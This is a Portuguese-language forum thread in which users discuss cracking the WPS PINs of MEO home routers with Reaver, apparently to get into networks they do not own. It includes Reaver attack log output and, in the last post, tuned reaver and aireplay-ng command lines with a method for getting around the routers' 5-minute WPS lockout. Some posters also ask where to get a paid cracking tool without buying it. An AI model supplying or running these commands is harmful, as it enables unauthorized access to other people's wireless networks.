Portal Chamar Táxi

Procuro dicionarios redes WiFi

fuynha

GF Prata
Entrou
Jan 19, 2007
Gostos Recebidos
2
Com a actualização dos novos firmwares da meo esqueçam para já o wps, pois já vem corrigida parcialmente essa falha.

Uma coisa companheiro Pancadas, compras-te o reaver pro ou baixas-te de algum sitio? podes disponibilizá-lo?

Cump's

pancadas

GF Ouro
Entrou
Out 2, 2006
Gostos Recebidos
1
Comprei na net pesquisando, mas já o tenho a algum tempo não me recorda de onde o tirei, mas não foi fácil de o arranjar. Pesquisa por reaver pro2 que podes ser que te safes
O problema dos meo e que isso ate se consegue, mas demora muitos dias a fazer isso.
Pode durar uma semana a descobrir a passe, e no final de descobrir o dono a mudar heheeh.

fuynha

GF Prata
Entrou
Jan 19, 2007
Gostos Recebidos
2
testei o reaver 1.4 em alguns router's thomson da meo e em alguns casos demorei dias,

mas agora com o novo firmeware nunca mais consegui não passa daqui,

[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request

msramalho

GF Bronze
Membro Inactivo
Entrou
Mai 20, 2014
Gostos Recebidos
0
Ya, com os novos firmwares não funciona. Eles bloqueiam para sempre o wps do router passado x tentativas, não sei se o mac spoofing te ajudará.
Ouvi dizer uma vez que o pro funciona nos Zon mas nunca mais voltei a ouvir isso, nem consegui comprovar. Se alguém souber a resposta agradeço.

Última edição:

pedropt

GF Bronze
Membro Inactivo
Entrou
Dez 6, 2007
Gostos Recebidos
0
o segredo para dár a volta aos routers MEO com o reaver é :
não usar o delay entre tentativas de pins , mas usar o lock .
os router da meo diponibilizam uma série de pins para o reaver , +-5 pins , depois bloqueiam exactamente 5 minutos , depois desbloqueiam outravez .
Outra situação é que a autenticação tem de ser feita pelo aireplay-ng com um timming de 240 segundos .

comando reaver :
reaver -i mon0 -b maccaddresrouter -c canal router -vv -A - K 0 -N -E -l 301
aireplay :
aireplay-ng -1 240 -a maccaddress router mon0